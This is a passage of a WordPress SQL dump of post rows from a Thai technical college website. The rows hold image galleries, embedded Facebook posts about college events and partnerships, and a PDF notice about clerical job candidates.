(5004, 3, '2019-01-10 09:08:06', '2019-01-10 02:08:06', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<a href=\"/wp-content/uploads/2019/01/10-1-2562-9-00-17.png\"><img class=\"aligncenter size-full wp-image-5002\" src=\"/wp-content/uploads/2019/01/10-1-2562-9-00-17.png\" alt=\"\" width=\"194\" height=\"248\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2019/01/10-1-2562-9-01-10.png\"><img class=\"aligncenter wp-image-5003\" src=\"/wp-content/uploads/2019/01/10-1-2562-9-01-10.png\" alt=\"\" width=\"398\" height=\"103\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/12/27-6-2561-10-59-50.jpg\"><img class=\"aligncenter size-full wp-image-4758\" src=\"/wp-content/uploads/2018/12/27-6-2561-10-59-50.jpg\" alt=\"\" width=\"194\" height=\"241\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/12/Picture1.png\"><img class=\"aligncenter wp-image-4760\" src=\"/wp-content/uploads/2018/12/Picture1.png\" alt=\"\" width=\"355\" height=\"103\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1654 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-24-55.jpg\" alt=\"\" width=\"246\" height=\"308\" />\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A8%E0%B8%B9%E0%B8%99%E0%B8%A2%E0%B9%8C%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5/\"><img class=\"aligncenter wp-image-2799 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-9-51-29.jpg\" alt=\"\" width=\"192\" height=\"239\" /></a>\r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A8%E0%B8%B9%E0%B8%99%E0%B8%A2%E0%B9%8C%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5/\"><img class=\"aligncenter wp-image-1635\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" /></a>\r\n\r\n<img class=\"aligncenter size-full wp-image-3459\" src=\"/wp-content/uploads/2018/07/16-7-2561-11-29-11.jpg\" alt=\"\" width=\"294\" height=\"333\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1638\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-01.jpg\" alt=\"\" width=\"194\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-1639\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-18-300x80.jpg\" alt=\"\" width=\"376\" height=\"100\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3393\" src=\"/wp-content/uploads/2018/07/65424786453.jpg\" alt=\"\" width=\"228\" height=\"333\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1642\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-57-37.jpg\" alt=\"\" width=\"202\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1643\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-53-30-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter size-medium wp-image-1657\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-26-35-223x300.jpg\" alt=\"\" width=\"223\" height=\"300\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1646\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-21.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1647\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-34-300x80.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1648 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-05-03.jpg\" alt=\"\" width=\"506\" height=\"323\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1652\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-22-50.jpg\" alt=\"\" width=\"191\" height=\"237\" />\r\n\r\n<img class=\"aligncenter wp-image-1650\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-21-54-300x81.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"aligncenter wp-image-1755 size-full\" src=\"/wp-content/uploads/2018/03/12-3-2561-14-57-21.jpg\" alt=\"\" width=\"574\" height=\"318\" />\r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1588-revision-v1', '', '', '2019-01-10 09:08:06', '2019-01-10 02:08:06', '', 1588, 'http://www.technicrayong.ac.th/1588-revision-v1/', 0, 'revision', '', 0),
(5005, 3, '2019-01-10 09:11:30', '2019-01-10 02:11:30', '', '8-8-2561 11-39-38', '', 'inherit', 'closed', 'closed', '', '8-8-2561-11-39-38-2', '', '', '2019-01-10 09:11:30', '2019-01-10 02:11:30', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/8-8-2561-11-39-38.jpg', 0, 'attachment', 'image/jpeg', 0),
(5006, 3, '2019-01-10 09:17:40', '2019-01-10 02:17:40', '', '9-7-2561 8-46-13', '', 'inherit', 'closed', 'closed', '', '9-7-2561-8-46-13-2', '', '', '2019-01-10 09:17:40', '2019-01-10 02:17:40', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/9-7-2561-8-46-13.jpg', 0, 'attachment', 'image/jpeg', 0),
(5007, 3, '2019-01-10 09:17:46', '2019-01-10 02:17:46', '', '10-1-2562 9-16-47', '', 'inherit', 'closed', 'closed', '', '10-1-2562-9-16-47', '', '', '2019-01-10 09:17:46', '2019-01-10 02:17:46', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/10-1-2562-9-16-47.png', 0, 'attachment', 'image/png', 0),
(5008, 3, '2019-01-10 09:17:53', '2019-01-10 02:17:53', '', '10-1-2562 9-17-13', '', 'inherit', 'closed', 'closed', '', '10-1-2562-9-17-13', '', '', '2019-01-10 09:17:53', '2019-01-10 02:17:53', '', 1588, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/10-1-2562-9-17-13.png', 0, 'attachment', 'image/png', 0),
(5009, 3, '2019-01-10 09:20:28', '2019-01-10 02:20:28', '<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<a href=\"/wp-content/uploads/2019/01/10-1-2562-9-00-17.png\"><img class=\"aligncenter size-full wp-image-5002\" src=\"/wp-content/uploads/2019/01/10-1-2562-9-00-17.png\" alt=\"\" width=\"194\" height=\"248\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2019/01/10-1-2562-9-01-10.png\"><img class=\"aligncenter wp-image-5003\" src=\"/wp-content/uploads/2019/01/10-1-2562-9-01-10.png\" alt=\"\" width=\"398\" height=\"103\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/12/27-6-2561-10-59-50.jpg\"><img class=\"aligncenter size-full wp-image-4758\" src=\"/wp-content/uploads/2018/12/27-6-2561-10-59-50.jpg\" alt=\"\" width=\"194\" height=\"241\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2018/12/Picture1.png\"><img class=\"aligncenter wp-image-4760\" src=\"/wp-content/uploads/2018/12/Picture1.png\" alt=\"\" width=\"355\" height=\"103\" /></a>\r\n\r\n<img class=\"aligncenter wp-image-1654 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-24-55.jpg\" alt=\"\" width=\"246\" height=\"308\" />\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A8%E0%B8%B9%E0%B8%99%E0%B8%A2%E0%B9%8C%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5/\"><img class=\"aligncenter wp-image-2799 size-full\" src=\"/wp-content/uploads/2018/05/30-5-2561-9-51-29.jpg\" alt=\"\" width=\"192\" height=\"239\" /></a>\r\n\r\n<img class=\"aligncenter size-full wp-image-1485\" src=\"/wp-content/uploads/2018/03/5-3-2561-13-45-54.jpg\" alt=\"\" width=\"195\" height=\"238\" />\r\n\r\n<a href=\"/%E0%B8%87%E0%B8%B2%E0%B8%99%E0%B8%A8%E0%B8%B9%E0%B8%99%E0%B8%A2%E0%B9%8C%E0%B8%82%E0%B9%89%E0%B8%AD%E0%B8%A1%E0%B8%B9%E0%B8%A5/\"><img class=\"aligncenter wp-image-1635\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-43-12-300x79.jpg\" alt=\"\" width=\"376\" height=\"99\" /></a>\r\n\r\n<img class=\"aligncenter size-full wp-image-3459\" src=\"/wp-content/uploads/2018/07/16-7-2561-11-29-11.jpg\" alt=\"\" width=\"294\" height=\"333\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1638\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-01.jpg\" alt=\"\" width=\"194\" height=\"241\" />\r\n\r\n<img class=\"aligncenter wp-image-1639\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-49-18-300x80.jpg\" alt=\"\" width=\"376\" height=\"100\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-3393\" src=\"/wp-content/uploads/2018/07/65424786453.jpg\" alt=\"\" width=\"228\" height=\"333\" />\r\n\r\n<img class=\"aligncenter size-full wp-image-1642\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-57-37.jpg\" alt=\"\" width=\"202\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1643\" src=\"/wp-content/uploads/2018/03/7-3-2561-14-53-30-300x81.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<a href=\"/wp-content/uploads/2019/01/8-8-2561-11-39-38.jpg\"><img class=\"aligncenter size-full wp-image-5005\" src=\"/wp-content/uploads/2019/01/8-8-2561-11-39-38.jpg\" alt=\"\" width=\"238\" height=\"312\" /></a>\r\n\r\n<img class=\"aligncenter size-full wp-image-1646\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-21.jpg\" alt=\"\" width=\"195\" height=\"239\" />\r\n\r\n<img class=\"aligncenter wp-image-1647\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-01-34-300x80.jpg\" alt=\"\" width=\"376\" height=\"101\" />\r\n\r\n<img class=\"aligncenter wp-image-1648 size-full\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-05-03.jpg\" alt=\"\" width=\"506\" height=\"323\" /><a href=\"/wp-content/uploads/2019/01/9-7-2561-8-46-13.jpg\"><img class=\"aligncenter size-full wp-image-5006\" src=\"/wp-content/uploads/2019/01/9-7-2561-8-46-13.jpg\" alt=\"\" width=\"195\" height=\"245\" /></a>\r\n\r\n<a href=\"/wp-content/uploads/2019/01/10-1-2562-9-16-47.png\"><img class=\"aligncenter wp-image-5007\" src=\"/wp-content/uploads/2019/01/10-1-2562-9-16-47.png\" alt=\"\" width=\"392\" height=\"103\" /></a><a href=\"/wp-content/uploads/2019/01/10-1-2562-9-17-13.png\"><img class=\"size-full wp-image-5008 aligncenter\" src=\"/wp-content/uploads/2019/01/10-1-2562-9-17-13.png\" alt=\"\" width=\"305\" height=\"325\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n ', 'โครงสร้างฝ่ายแผนงานและความร่วมมือ', '', 'inherit', 'closed', 'closed', '', '1588-revision-v1', '', '', '2019-01-10 09:20:28', '2019-01-10 02:20:28', '', 1588, 'http://www.technicrayong.ac.th/1588-revision-v1/', 0, 'revision', '', 0),
(5012, 3, '2019-01-11 14:48:37', '2019-01-11 07:48:37', '', '201901111424', '', 'inherit', 'closed', 'closed', '', '201901111424', '', '', '2019-01-11 14:48:37', '2019-01-11 07:48:37', '', 0, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/201901111424.jpg', 0, 'attachment', 'image/jpeg', 0),
(5017, 3, '2019-01-14 09:05:14', '2019-01-14 02:05:14', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D741539046222286%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพฤหัสบดีที่ ๑๐ มกราคม ๒๕๖๒ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง คุณอรอุมา เวียงสิมมา ตำแหน่งเจ้าหน้าที่ฝ่ายบุคคล บริษัท อีเลคโทรลักซ์ ประเทศไทย จำกัด เข้าทำความร่วมมือบันทึกข้อตกลงทางวิชาการ เพื่อการจัดการศึกษาด้านอาชีวศึกษา ระหว่าง วิทยาลัยเทคนิคระยอง กับ บริษัท อีเลคโทรลักซ์ ประเทศไทย จำกัด ณ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%9e%e0%b8%a4%e0%b8%ab%e0%b8%b1%e0%b8%aa%e0%b8%9a%e0%b8%94%e0%b8%b5%e0%b8%97%e0%b8%b5%e0%b9%88-%e0%b9%91%e0%b9%90-%e0%b8%a1%e0%b8%81%e0%b8%a3%e0%b8%b2%e0%b8%84%e0%b8%a1', '', '', '2019-01-14 09:05:14', '2019-01-14 02:05:14', '', 0, 'http://www.technicrayong.ac.th/?p=5017', 167, 'post', '', 0),
(5018, 3, '2019-01-14 09:04:09', '2019-01-14 02:04:09', '', '49286284_741538692888988_6841380365584564224_o', '', 'inherit', 'closed', 'closed', '', '49286284_741538692888988_6841380365584564224_o', '', '', '2019-01-14 09:04:09', '2019-01-14 02:04:09', '', 5017, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/49286284_741538692888988_6841380365584564224_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(5019, 3, '2019-01-14 09:05:14', '2019-01-14 02:05:14', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D741539046222286%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'วันพฤหัสบดีที่ ๑๐ มกราคม ๒๕๖๒ ว่าที่เรือตรีชูชีพ อรุณเหลือง ผู้อำนวยการวิทยาลัยเทคนิคระยอง คุณอรอุมา เวียงสิมมา ตำแหน่งเจ้าหน้าที่ฝ่ายบุคคล บริษัท อีเลคโทรลักซ์ ประเทศไทย จำกัด เข้าทำความร่วมมือบันทึกข้อตกลงทางวิชาการ เพื่อการจัดการศึกษาด้านอาชีวศึกษา ระหว่าง วิทยาลัยเทคนิคระยอง กับ บริษัท อีเลคโทรลักซ์ ประเทศไทย จำกัด ณ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '5017-revision-v1', '', '', '2019-01-14 09:05:14', '2019-01-14 02:05:14', '', 5017, 'http://www.technicrayong.ac.th/5017-revision-v1/', 0, 'revision', '', 0),
(5021, 3, '2019-01-14 11:33:46', '2019-01-14 04:33:46', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B5%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B9%80%E0%B8%9B%E0%B9%87%E0%B8%99%E0%B8%A5%E0%B8%B9%E0%B8%81%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%8A%E0%B8%B1%E0%B9%88%E0%B8%A7%E0%B8%84%E0%B8%A3%E0%B8%B2%E0%B8%A7-%E0%B8%97%E0%B8%B3%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B8%98%E0%B8%B8%E0%B8%A3%E0%B8%81%E0%B8%B2%E0%B8%A3-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-4-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้มีสิทธิสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่เจ้าหน้าที่ธุรการ จำนวน ๔ อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%a1%e0%b8%b5%e0%b8%aa%e0%b8%b4%e0%b8%97-7', '', '', '2019-01-14 11:34:43', '2019-01-14 04:34:43', '', 0, 'http://www.technicrayong.ac.th/?p=5021', 166, 'post', '', 0),
(5022, 3, '2019-01-14 11:33:01', '2019-01-14 04:33:01', '', 'ประกาศ รายชื่อผู้มีสิทธิสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ธุรการ จำนวน 4 อัตรา', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%a1%e0%b8%b5%e0%b8%aa%e0%b8%b4%e0%b8%97-7', '', '', '2019-01-14 11:33:01', '2019-01-14 04:33:01', '', 5021, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/ประกาศ-รายชื่อผู้มีสิทธิสอบคัดเลือกเป็นลูกจ้างชั่วคราว-ทำหน้าที่ธุรการ-จำนวน-4-อัตรา.pdf', 0, 'attachment', 'application/pdf', 0),
(5023, 3, '2019-01-14 11:33:46', '2019-01-14 04:33:46', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B5%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B9%80%E0%B8%9B%E0%B9%87%E0%B8%99%E0%B8%A5%E0%B8%B9%E0%B8%81%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%8A%E0%B8%B1%E0%B9%88%E0%B8%A7%E0%B8%84%E0%B8%A3%E0%B8%B2%E0%B8%A7-%E0%B8%97%E0%B8%B3%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B8%98%E0%B8%B8%E0%B8%A3%E0%B8%81%E0%B8%B2%E0%B8%A3-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-4-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้มีสิทธิสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ เจ้าหน้าที่ธุรการ จำนวน ๔ อัตรา', '', 'inherit', 'closed', 'closed', '', '5021-revision-v1', '', '', '2019-01-14 11:33:46', '2019-01-14 04:33:46', '', 5021, 'http://www.technicrayong.ac.th/5021-revision-v1/', 0, 'revision', '', 0),
(5024, 3, '2019-01-14 11:34:12', '2019-01-14 04:34:12', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B5%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B9%80%E0%B8%9B%E0%B9%87%E0%B8%99%E0%B8%A5%E0%B8%B9%E0%B8%81%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%8A%E0%B8%B1%E0%B9%88%E0%B8%A7%E0%B8%84%E0%B8%A3%E0%B8%B2%E0%B8%A7-%E0%B8%97%E0%B8%B3%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B8%98%E0%B8%B8%E0%B8%A3%E0%B8%81%E0%B8%B2%E0%B8%A3-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-4-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้มีสิทธิสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ เจ้าหน้าที่ธุรการ จำนวน ๔ อัตรา', '', 'inherit', 'closed', 'closed', '', '5021-autosave-v1', '', '', '2019-01-14 11:34:12', '2019-01-14 04:34:12', '', 5021, 'http://www.technicrayong.ac.th/5021-autosave-v1/', 0, 'revision', '', 0),
(5025, 3, '2019-01-14 11:34:43', '2019-01-14 04:34:43', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2019%2F01%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B5%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B9%80%E0%B8%9B%E0%B9%87%E0%B8%99%E0%B8%A5%E0%B8%B9%E0%B8%81%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B8%8A%E0%B8%B1%E0%B9%88%E0%B8%A7%E0%B8%84%E0%B8%A3%E0%B8%B2%E0%B8%A7-%E0%B8%97%E0%B8%B3%E0%B8%AB%E0%B8%99%E0%B9%89%E0%B8%B2%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B8%98%E0%B8%B8%E0%B8%A3%E0%B8%81%E0%B8%B2%E0%B8%A3-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-4-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้มีสิทธิสอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่เจ้าหน้าที่ธุรการ จำนวน ๔ อัตรา', '', 'inherit', 'closed', 'closed', '', '5021-revision-v1', '', '', '2019-01-14 11:34:43', '2019-01-14 04:34:43', '', 5021, 'http://www.technicrayong.ac.th/5021-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(5026, 3, '2019-01-15 14:53:30', '2019-01-15 07:53:30', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D743468762695981%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'การประชุมสรุปงาน ประจำปีการศึกษา ๒๕๖๑ โครงการ Excellent Model School ตามโครงการ MOU ระหว่าง SCG กับ วิทยาลัยเทคนิคระยอง ในสาขาวิชาปิโตรเคมี เครื่องมือวัดและควบคุมในงานอุตสาหกรรม เทคโนโลยีสารสนเทศและการสื่อสาร เทคนิคการผลิต และการจัดการโลจิสติกส์ ณ ห้องประชุมประกันคุณภาพ อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b8%e0%b8%a1%e0%b8%aa%e0%b8%a3%e0%b8%b8%e0%b8%9b%e0%b8%87%e0%b8%b2%e0%b8%99-%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%88%e0%b8%b3%e0%b8%9b', '', '', '2019-01-15 14:53:30', '2019-01-15 07:53:30', '', 0, 'http://www.technicrayong.ac.th/?p=5026', 165, 'post', '', 0),
(5027, 3, '2019-01-15 14:53:10', '2019-01-15 07:53:10', '', '49948195_743465459362978_6523695756551913472_o', '', 'inherit', 'closed', 'closed', '', '49948195_743465459362978_6523695756551913472_o', '', '', '2019-01-15 14:53:10', '2019-01-15 07:53:10', '', 5026, 'http://www.technicrayong.ac.th/wp-content/uploads/2019/01/49948195_743465459362978_6523695756551913472_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(5028, 3, '2019-01-15 14:53:30', '2019-01-15 07:53:30', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D743468762695981%26id%3D100010985913485&width=500\" width=\"500\" height=\"726\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'การประชุมสรุปงาน ประจำปีการศึกษา ๒๕๖๑ โครงการ Excellent Model School ตามโครงการ MOU ระหว่าง SCG กับ วิทยาลัยเทคนิคระยอง ในสาขาวิชาปิโตรเคมี เครื่องมือวัดและควบคุมในงานอุตสาหกรรม เทคโนโลยีสารสนเทศและการสื่อสาร เทคนิคการผลิต และการจัดการโลจิสติกส์ ณ ห้องประชุมประกันคุณภาพ อาคารอำนวยการ วิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '5026-revision-v1', '', '', '2019-01-15 14:53:30', '2019-01-15 07:53:30', '', 5026, 'http://www.technicrayong.ac.th/5026-revision-v1/', 0, 'revision', '', 0),
(5029, 3, '2019-01-15 15:01:50', '2019-01-15 08:01:50', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fpermalink.php%3Fstory_fbid%3D743927609316763%26id%3D100010985913485&width=500\" width=\"500\" height=\"802\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'ระหว่างวันที่ ๒-๙ มกราคม ๒๕๖๒ นายอานุภาพ วาสะสิริ รองผู้อำนวยการฝ่ายวิชาการ และนายทนง ทองมาก หัวหน้าแผนกวิชาช่าไฟฟ้ากำลัง ได้เดินทางไปนิเทศการจัดการเรียนการสอน และรับนักศึกษาที่ได้ไปศึกษา ณ วิทยาลัยการรถไฟความเร็วสูงหูหนาน สาธารณรัฐประชาชนจีน ระหว่างวันที่ ๖ ก.ค.๒๕๖๑ - ๘ ม.ค.๒๕๖๒ กลับไทย พร้อมทั้งนำนักศึกษาเดินทางเข้าพบ ดร.ประชาคม จันทรชิต รองเลขาธิการคณะกรรมการการอาชีวศึกษา เนื่องในโอกาสที่สำเร็จการศึกษา และเดินทางกลับมายังประเทศไทย', '', 'publish', 'closed', 'open', '', 